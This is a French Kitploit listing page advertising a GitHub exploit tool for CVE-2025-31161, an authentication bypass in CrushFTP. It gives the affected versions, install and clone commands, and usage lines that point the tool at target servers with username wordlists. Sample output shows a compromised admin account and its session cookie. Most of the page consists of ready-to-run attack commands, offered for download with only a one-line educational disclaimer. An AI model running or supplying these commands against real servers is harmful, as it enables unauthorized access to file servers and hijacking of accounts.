Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-31161 — CrushFTP CVE-2025-31161 Outil d'exploit 🔓 | Kitploit
Outils/GitHubGitHub/tx-one/cve-2025-31161
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionAuthentification
GitHubtx-one/cve-2025-31161

CVE-2025-31161

CrushFTP CVE-2025-31161 Outil d'exploit 🔓

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil d'exploitation CrushFTP CVE-2025-31161 🔓

Outil avancé de détection et d'exploitation pour la vulnérabilité CVE-2025-31161 dans les versions vulnérables de CrushFTP.

CVE-2025-31161 est une vulnérabilité critique de contournement d'authentification dans l'interface Web de CrushFTP. En manipulant l'en-tête HTTP Authorization, un attaquant non authentifié peut obtenir un accès complet sous n'importe quel nom d'utilisateur valide sans fournir le mot de passe correct.

Versions affectées

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

Versions Enterprise de CrushFTP antérieures à 9.3.12.5

Fonctionnalités clés 🚀

  • Détection automatique de la version de CrushFTP et vérification de la vulnérabilité
  • Test d'identifiants multi-threadé pour une énumération rapide des utilisateurs
  • Prise en charge de deux méthodes d'authentification (Bearer Token et Basic Auth)
  • Génération de rapports JSON avec cookies de session
  • Mécanismes de reconnexion intelligents avec configurations personnalisées
  • Affichage console colorisé avec journalisation détaillée
  • Couverture des versions vulnérables :
    • 9.3.8 à 9.3.12.5

Prérequis 📋

  • Python 3.8+
  • Paquets requis :
    root@kitploit:~
    pip install requests colorama urllib3
    

Installation 🛠️

  1. Installer les dépendances :
root@kitploit:~
 pip install requests colorama urllib3
  1. Cloner le dépôt :
root@kitploit:~
 git clone https://github.com/TX-One/CVE-2025-31161.git
 cd CVE-2025-31161
 python3 tx-crush.py -h

Utilisation 🖥️

Commande de base :

root@kitploit:~
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json

Options :

root@kitploit:~
-h, --help            Affiche ce message d'aide et quitte
  -t, --target TARGET   URL cible (ex. https://example.com:8080)
  -u, --users USERS     Fichier contenant la liste des noms d'utilisateur
  -o, --output OUTPUT   Fichier JSON de sortie
  -T, --threads THREADS
                        Nombre de threads (par défaut : 5)
  --no-ssl              Désactiver la vérification SSL
  --timeout TIMEOUT     Délai d'attente de la requête (par défaut : 15)
  --retries RETRIES     Nombre de tentatives (par défaut : 3)
  --force               Ignorer la vérification de version

Exemple avancé :

root@kitploit:~
python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20

Exemple de sortie 📄

root@kitploit:~
[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
root@kitploit:~
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]

Avertissement : Ce projet est destiné uniquement à des fins éducatives et de recherche en sécurité. Une utilisation responsable est requise.

Télécharger l’outil